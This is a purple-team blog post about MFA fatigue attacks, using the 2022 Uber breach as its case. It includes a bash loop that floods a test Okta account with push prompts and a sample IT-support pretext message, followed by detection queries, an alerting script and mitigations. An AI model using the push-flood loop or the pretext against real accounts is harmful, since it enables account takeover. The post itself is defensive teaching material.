<h2 id="the-uber-breach-anatomy-minute-by-minute">The Uber Breach: Anatomy Minute by Minute</h2>
<p>September 15, 2022. The attacker&#8217;s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.</p>
<p><strong>The credential acquisition:</strong> Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for a contractor&#8217;s Uber corporate account.</p>
<p><strong>The MFA flood:</strong></p>
<p>The contractor&#8217;s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor&#8217;s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.</p>
<p><strong>The WhatsApp message:</strong></p>
<p>The attacker sent a WhatsApp message to the contractor&#8217;s number, claiming to be from Uber IT support:</p>
<blockquote>
<p>&#8220;Hi, this is the Uber IT support team. We&#8217;re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.&#8221;</p>
</blockquote>
<p>The contractor accepted the next push notification.</p>
<p><strong>Post-authentication enumeration:</strong></p>
<p>With an authenticated session, the attacker accessed Uber&#8217;s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.</p>
<p><strong>The blast radius:</strong></p>
<p>With Thycotic admin access, the attacker retrieved credentials for:<br />
&#8211; AWS IAM accounts<br />
&#8211; GCP service accounts<br />
&#8211; Google Workspace admin<br />
&#8211; VMware vSphere<br />
&#8211; Slack workspace admin<br />
&#8211; HackerOne bug bounty program admin (including details of open security reports)</p>
<p>The entire Uber infrastructure was accessible from one contractor&#8217;s push notification acceptance.</p>
<p><strong>What Uber&#8217;s logs showed:</strong></p>
<pre><code class="" data-line="">2022-09-15T02:17:00Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] user=contractor@uber.com  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] user=contractor@uber.com  connection=established  ip=&lt;attacker&gt;
</code></pre>
<p>Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.</p>
<hr />
<h2 id="red-phase-simulating-mfa-fatigue">Red Phase: Simulating MFA Fatigue</h2>
<h3 id="what-the-attack-looks-like-in-tooling">What the Attack Looks Like in Tooling</h3>
<p>MFA fatigue attacks are conducted manually — an attacker with valid credentials and knowledge of which MFA system the target uses. No special tooling is required for the attack itself. What can be simulated:</p>
<p><strong>Option 1: Repeated legitimate login attempts (test account only)</strong></p>
<pre><code class="" data-line=""># DO NOT run against production accounts or accounts you don&#039;t own

# Using Okta API to authenticate (test environment only)
TEST_USERNAME=&quot;testuser@yourdomain.com&quot;
TEST_PASSWORD=&quot;TestPassword123!&quot;
OKTA_DOMAIN=&quot;your-org.okta.com&quot;

for i in {1..5}; do
  echo &quot;Attempt $i at $(date +%T)&quot;
  response=$(curl -s -X POST \
    &quot;https://${OKTA_DOMAIN}/api/v1/authn&quot; \
    -H &quot;Content-Type: application/json&quot; \
    -d &quot;{\&quot;username\&quot;: \&quot;${TEST_USERNAME}\&quot;, \&quot;password\&quot;: \&quot;${TEST_PASSWORD}\&quot;}&quot;)

  status=$(echo &quot;$response&quot; | jq -r &#039;.status&#039;)
  echo &quot;  Status: $status&quot;

  if [ &quot;$status&quot; = &quot;MFA_CHALLENGE&quot; ]; then
    state_token=$(echo &quot;$response&quot; | jq -r &#039;.stateToken&#039;)
    factor_id=$(echo &quot;$response&quot; | jq -r &#039;._embedded.factors[] | select(.factorType == &quot;push&quot;) | .id&#039;)
    echo &quot;  Factor ID: $factor_id (push notification triggered)&quot;

    # In a real attack, the attacker would poll for the MFA response:
    echo &quot;  Waiting 10 seconds for user to respond...&quot;
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done
</code></pre>
<p><strong>Option 2: Tabletop exercise (no credentials required)</strong></p>
<p>For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:</p>
<pre><code class="" data-line=""># Okta System Log: find users with multiple MFA failures followed by success
curl -H &quot;Authorization: SSWS ${OKTA_API_TOKEN}&quot; \
  &quot;https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\&quot;user.authentication.auth_via_mfa\&quot;&amp;limit=1000&quot; | \
  jq &#039;
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == &quot;FAILURE&quot;)] | length,
      successes: [.[] | select(.outcome.result == &quot;SUCCESS&quot;)] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  &#039;
</code></pre>
<p>Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.</p>
<hr />
<h2 id="blue-phase-detection-across-identity-providers">Blue Phase: Detection Across Identity Providers</h2>
<h3 id="okta-push-notification-flood">Okta: Push Notification Flood</h3>
<pre><code class="" data-line=""># Okta System Log — detect repeated push failures from same user
# Query for: &gt;3 push failures within 10 minutes for same user
curl -H &quot;Authorization: SSWS ${OKTA_API_TOKEN}&quot; \
  &quot;https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\&quot;user.authentication.auth_via_mfa\&quot;+and+outcome.result+eq+\&quot;FAILURE\&quot;&amp;since=$(date -u -d &#039;24 hours ago&#039; +%Y-%m-%dT%H:%M:%SZ)&quot; | \
  jq &#039;
    group_by(.actor.id, (.published[0:15])) |
    map(select(length &gt;= 3)) |
    map({
      user: .[0].actor.displayName,
      window: (.[0].published[0:15] + &quot;0&quot;),
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  &#039;
</code></pre>
<h3 id="azure-ad-conditional-access-logs">Azure AD: Conditional Access Logs</h3>
<pre><code class="" data-line=""># Azure AD: MFA push denial flood detection (using Azure CLI)
az monitor activity-log list \
  --start-time &quot;$(date -u -d &#039;24 hours ago&#039; +%Y-%m-%dT%H:%M:%SZ)&quot; \
  --query &quot;[?contains(operationName.value, &#039;MFA&#039;)].{user:caller,time:eventTimestamp,result:status.value}&quot; \
  --output table
</code></pre>
<p>In Microsoft Sentinel, the detection rule for MFA fatigue:</p>
<pre><code class="" data-line="">// Azure AD MFA Fatigue Detection — Sentinel KQL
SigninLogs
| where TimeGenerated &gt; ago(24h)
| where AuthenticationRequirement == &quot;multiFactorAuthentication&quot;
| summarize
    FailureCount = countif(ResultType != &quot;0&quot;),  // Non-success
    SuccessCount = countif(ResultType == &quot;0&quot;),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 10m)
| where FailureCount &gt;= 3
| where SuccessCount &gt;= 1
| where datetime_diff(&#039;minute&#039;, EndTime, StartTime) &lt;= 30
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc
</code></pre>
<h3 id="aws-cloudtrail-console-session-after-mfa-flood">AWS CloudTrail: Console Session After MFA Flood</h3>
<p>If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:</p>
<pre><code class="" data-line=""># Find AWS console login events from unusual IPs
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time &quot;$(date -d &#039;24 hours ago&#039; --iso-8601=seconds)&quot; \
  --query &#039;Events[].{Time:EventTime,User:Username,IP:CloudTrailEvent}&#039; \
  --output json | \
  jq &#039;.[] | {
    time: .Time,
    user: .User,
    ip: (.IP | fromjson | .sourceIPAddress),
    mfa: (.IP | fromjson | .additionalEventData.MFAUsed)
  }&#039;
</code></pre>
<h3 id="what-a-guardduty-alert-looks-like-for-this-attack">What a GuardDuty Alert Looks Like for This Attack</h3>
<p>GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:</p>
<ul>
<li><code class="" data-line="">UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B</code> — console login from unusual geographic location or Tor exit node</li>
<li><code class="" data-line="">Discovery:IAMUser/AnomalousBehavior</code> — if the attacker begins enumerating IAM after console access</li>
</ul>
<p>The gap: GuardDuty&#8217;s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.</p>
<hr />
<h2 id="purple-phase-the-structural-fix">Purple Phase: The Structural Fix</h2>
<h3 id="fix-1-replace-push-mfa-with-fido2-hardware-keys-for-tier-0-accounts">Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)</h3>
<p>This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.</p>
<pre><code class="" data-line=""># Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# CLI example using Okta API:

# Create a new authentication policy requiring hardware authenticator
curl -X POST \
  &quot;https://your-org.okta.com/api/v1/policies&quot; \
  -H &quot;Authorization: SSWS ${OKTA_API_TOKEN}&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d &#039;{
    &quot;name&quot;: &quot;Admin Hardware Key Policy&quot;,
    &quot;type&quot;: &quot;ACCESS_POLICY&quot;,
    &quot;status&quot;: &quot;ACTIVE&quot;,
    &quot;description&quot;: &quot;Requires FIDO2 hardware key for admin access&quot;
  }&#039;
</code></pre>
<p><strong>Phasing hardware keys across an organization:</strong></p>
<table>
<thead>
<tr>
<th>Tier</th>
<th>Examples</th>
<th>Timeline</th>
</tr>
</thead>
<tbody>
<tr>
<td>Tier 0 — immediate</td>
<td>Cloud admin, IAM admin, Okta admin, DNS admin</td>
<td>Week 1</td>
</tr>
<tr>
<td>Tier 1 — 30 days</td>
<td>All engineers with production access</td>
<td>Month 1</td>
</tr>
<tr>
<td>Tier 2 — 90 days</td>
<td>All employees with SSO access</td>
<td>Month 3</td>
</tr>
<tr>
<td>Contractors</td>
<td>Scope-limited access, enforce at boundary</td>
<td>Immediate</td>
</tr>
</tbody>
</table>
<h3 id="fix-2-number-matching-intermediate-mitigation">Fix 2: Number Matching (Intermediate Mitigation)</h3>
<p>If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple &#8220;approve/deny&#8221; push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.</p>
<pre><code class="" data-line=""># Duo: Enable number matching
# Duo Admin Console → Policies → Duo Push Number Matching: Required

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: &quot;Require number matching for push notifications&quot;

# Okta Verify: Enable number challenge
# Okta Admin → Security → Multifactor → Okta Verify → Enable &quot;Number Challenge&quot;
</code></pre>
<h3 id="fix-3-detect-and-block-automated-response-to-fatigue-pattern">Fix 3: Detect and Block — Automated Response to Fatigue Pattern</h3>
<pre><code class="" data-line="">#!/usr/bin/env python3
# Purple Team EP05 — MFA Fatigue Auto-Response
# Monitors Okta System Log; alerts the security team via SNS on fatigue pattern detection
# Run as a Lambda function or scheduled script in your SIEM pipeline

import boto3
import requests
import json
from datetime import datetime, timedelta

OKTA_DOMAIN = &quot;your-org.okta.com&quot;
OKTA_TOKEN = &quot;your-okta-api-token&quot;  # use Secrets Manager in production
SNS_TOPIC_ARN = &quot;arn:aws:sns:us-east-1:123456789012:security-alerts&quot;

def get_recent_mfa_events(hours=1):
    since = (datetime.utcnow() - timedelta(hours=hours)).strftime(&quot;%Y-%m-%dT%H:%M:%SZ&quot;)
    url = f&quot;https://{OKTA_DOMAIN}/api/v1/logs&quot;
    params = {
        &quot;filter&quot;: &#039;eventType eq &quot;user.authentication.auth_via_mfa&quot;&#039;,
        &quot;since&quot;: since,
        &quot;limit&quot;: 1000
    }
    headers = {&quot;Authorization&quot;: f&quot;SSWS {OKTA_TOKEN}&quot;}
    response = requests.get(url, params=params, headers=headers)
    return response.json()

def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    user_events = {}
    for event in events:
        user_id = event[&quot;actor&quot;][&quot;id&quot;]
        user_name = event[&quot;actor&quot;][&quot;displayName&quot;]
        result = event[&quot;outcome&quot;][&quot;result&quot;]
        timestamp = event[&quot;published&quot;]

        if user_id not in user_events:
            user_events[user_id] = {&quot;name&quot;: user_name, &quot;events&quot;: []}
        user_events[user_id][&quot;events&quot;].append({&quot;result&quot;: result, &quot;time&quot;: timestamp})

    fatigue_users = []
    for user_id, data in user_events.items():
        events_sorted = sorted(data[&quot;events&quot;], key=lambda x: x[&quot;time&quot;])
        failures = [e for e in events_sorted if e[&quot;result&quot;] == &quot;FAILURE&quot;]

        if len(failures) &gt;= failure_threshold:
            # Check if a success followed the failures
            last_failure_time = failures[-1][&quot;time&quot;]
            successes_after = [
                e for e in events_sorted
                if e[&quot;result&quot;] == &quot;SUCCESS&quot; and e[&quot;time&quot;] &gt; last_failure_time
            ]
            if successes_after:
                fatigue_users.append({
                    &quot;user_id&quot;: user_id,
                    &quot;user_name&quot;: data[&quot;name&quot;],
                    &quot;failure_count&quot;: len(failures),
                    &quot;success_after_failures&quot;: True
                })

    return fatigue_users

def alert_security_team(fatigue_users):
    sns = boto3.client(&quot;sns&quot;)
    message = f&quot;MFA FATIGUE ALERT — {len(fatigue_users)} user(s) detected:\n&quot;
    for user in fatigue_users:
        message += f&quot;  - {user[&#039;user_name&#039;]}: {user[&#039;failure_count&#039;]} failures then success\n&quot;

    sns.publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject=&quot;Purple Team: MFA Fatigue Attack Detected&quot;,
        Message=message
    )

def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
    return {&quot;fatigue_users_detected&quot;: len(fatigue_users)}
</code></pre>
<h3 id="fix-4-privileged-access-workstations-and-session-recording">Fix 4: Privileged Access Workstations and Session Recording</h3>
<p>The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. Once identity controls are in place, the downstream fix is to find and remove credentials stored in scripts and on shares:</p>
<pre><code class="" data-line=""># Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2&gt;/dev/null | \
  jq &#039;{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}&#039;
</code></pre>
<hr />
<h2 id="run-this-in-your-own-environment-mfa-audit">Run This in Your Own Environment: MFA Audit</h2>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP05 — MFA Coverage Audit
# Lists AWS console users without MFA and IAM users with access keys older than 90 days

echo &quot;=== AWS: Console Users Without MFA ===&quot;
aws iam generate-credential-report &gt; /dev/null 2&gt;&amp;1
sleep 5
aws iam get-credential-report --query &#039;Content&#039; --output text | base64 -d | \
  awk -F&#039;,&#039; &#039;NR&gt;1 &amp;&amp; $4==&quot;true&quot; &amp;&amp; $8==&quot;false&quot; {
    print &quot;  USER: &quot; $1 &quot; | Console: &quot; $4 &quot; | MFA: &quot; $8
  }&#039;

echo &quot;&quot;
echo &quot;=== AWS: IAM Users with Long-Lived Access Keys (rotation risk) ===&quot;
aws iam get-credential-report --query &#039;Content&#039; --output text | base64 -d | \
  awk -F&#039;,&#039; &#039;NR&gt;1 &amp;&amp; $9==&quot;true&quot; &amp;&amp; $10!=&quot;N/A&quot; {
    cmd = &quot;date -d &quot; $10 &quot; +%s&quot;
    cmd | getline key_date; close(cmd)
    now = systime()
    age_days = int((now - key_date) / 86400)
    if (age_days &gt; 90) print &quot;  USER: &quot; $1 &quot; | KEY AGE: &quot; age_days &quot; days&quot;
  }&#039;

echo &quot;&quot;
echo &quot;=== RECOMMENDATION ===&quot;
echo &quot;  - Any console user without MFA = immediate A07 exposure&quot;
echo &quot;  - For accounts with Okta/Azure AD: run IdP-specific audit above&quot;
echo &quot;  - Hardware FIDO2 keys required for all admin accounts&quot;
</code></pre>
<hr />
<h2 id="common-mistakes-when-responding-to-mfa-fatigue-risk"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Mistakes When Responding to MFA Fatigue Risk</h2>
<p><strong>Mandating security training as the primary response.</strong> The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.</p>
<p><strong>Implementing &#8220;number matching&#8221; and considering MFA fatigue solved.</strong> Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (&#8220;what number do you see on your screen?&#8221;). It buys time; it does not eliminate the attack class.</p>
<p><strong>Requiring MFA for employees but not contractors.</strong> The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.</p>
<p><strong>Not monitoring for the failure-then-success pattern.</strong> The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.</p>
<p><strong>Forgetting session tokens.</strong> The Okta breach was not MFA fatigue — it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Attack Variant</th>
<th>Mechanism</th>
<th>Structural Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>Push notification flood</td>
<td>Attacker initiates logins repeatedly until user accepts</td>
<td>FIDO2 hardware key MFA</td>
</tr>
<tr>
<td>Social engineering layer</td>
<td>Attacker contacts user claiming to be IT support</td>
<td>Hardware key (physical presence required)</td>
</tr>
<tr>
<td>Session token theft</td>
<td>Steal valid session without needing MFA at all</td>
<td>Short session lifetime + re-auth for sensitive ops</td>
</tr>
<tr>
<td>Number matching bypass</td>
<td>Relay number via voice call in real time</td>
<td>Hardware key (no relay possible)</td>
</tr>
<tr>
<td>SIM swap</td>
<td>Port victim&#8217;s phone number to attacker&#8217;s SIM; receive OTP</td>
<td>Hardware key (phone-independent)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>An <strong>MFA fatigue attack</strong> exploits push notification UX — training users to tap &#8220;deny&#8221; competes with a trained habit of tapping &#8220;accept&#8221;; hardware keys eliminate the attack surface by requiring physical presence</li>
<li>The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)</li>
<li>Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP&#8217;s logs; adding the detection rule is the work</li>
<li>Number matching is a meaningful intermediate mitigation; it is not a structural fix</li>
<li>Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design</li>
<li>Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one</li>
<li>Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP06 covers CI/CD secrets exposure — how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07): short-lived credentials that cannot be exfiltrated because they don&#8217;t exist until the moment they&#8217;re needed.</p>
<p>Get EP06 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&#038;title=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" data-a2a-url="https://linuxcent.com/mfa-fatigue-attack-uber-okta/" data-a2a-title="MFA Fatigue Attacks: How Uber Got Breached and How to Stop It"></a></p><p>The post <a href="https://linuxcent.com/mfa-fatigue-attack-uber-okta/">MFA Fatigue Attacks: How Uber Got Breached and How to Stop It</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/mfa-fatigue-attack-uber-okta/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1855</post-id>	</item>
		<item>
		<title>DNS at the Kernel Level — What Your Pods Are Actually Resolving</title>
		<link>https://linuxcent.com/ebpf-dns-observability-kubernetes/</link>
					<comments>https://linuxcent.com/ebpf-dns-observability-kubernetes/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 06 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[CoreDNS]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Observability]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tracing]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1840</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Trace every DNS query your pods make — in real time at the kernel level — using eBPF tracepoints. No sidecar, no restart, no sampling. Visibility CoreDNS metrics can't give you.</p>
<p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel with a grey left border. position:relative anchors
   the absolutely positioned copy button and language badge defined below. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested in pre resets it and inherits the panel colours. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent per language group, keyed on the data-lang attribute of pre. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned to the top-right corner, invisible (opacity 0) until the block is hovered. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* State applied while the button carries the "copied" class. */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: top-left label, also shown only on hover; pointer-events:none
   keeps it from intercepting clicks and text selection. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Tables: full width, bordered cells, shaded header row and zebra striping. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
/*
 * Code-block enhancer. For every pre element on the page it:
 *   - copies the language from the inner code element's "language-xxx" class
 *     onto the pre element's data-lang attribute,
 *   - inserts a language badge as the first child of the pre element, and
 *   - appends a "Copy" button that copies the block text to the clipboard.
 */
(function(){
  // Run at most once per page; the flag on window guards against the script
  // being included more than once (presumably once per embedded post).
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorate every pre element currently in the document.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');
        badge.className='lc-lang-badge';
        badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      // Explicit type: a bare button defaults to "submit" and would submit an enclosing form.
      btn.type='button';
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        // Prefer the code element so the badge and button labels are not copied.
        var text=code?code.innerText:pre.innerText;
        // The async Clipboard API needs a secure context; otherwise use the legacy path.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then restore it.
  function failed(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Legacy fallback: select the text in an off-screen textarea and run the
  // "copy" command. execCommand reports failure by returning false (it does not
  // necessarily throw), so its result decides which feedback is shown.
  function fb(text,btn){
    var ta=null;
    var copied=false;
    try{
      ta=document.createElement('textarea');
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      copied=document.execCommand('copy');
    }catch(e){
      copied=false;
    }finally{
      // Always remove the helper element, including when an exception was thrown.
      if(ta&&ta.parentNode){ta.parentNode.removeChild(ta);}
    }
    if(copied){ok(btn);}else{failed(btn);}
  }
  // Enhance immediately if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
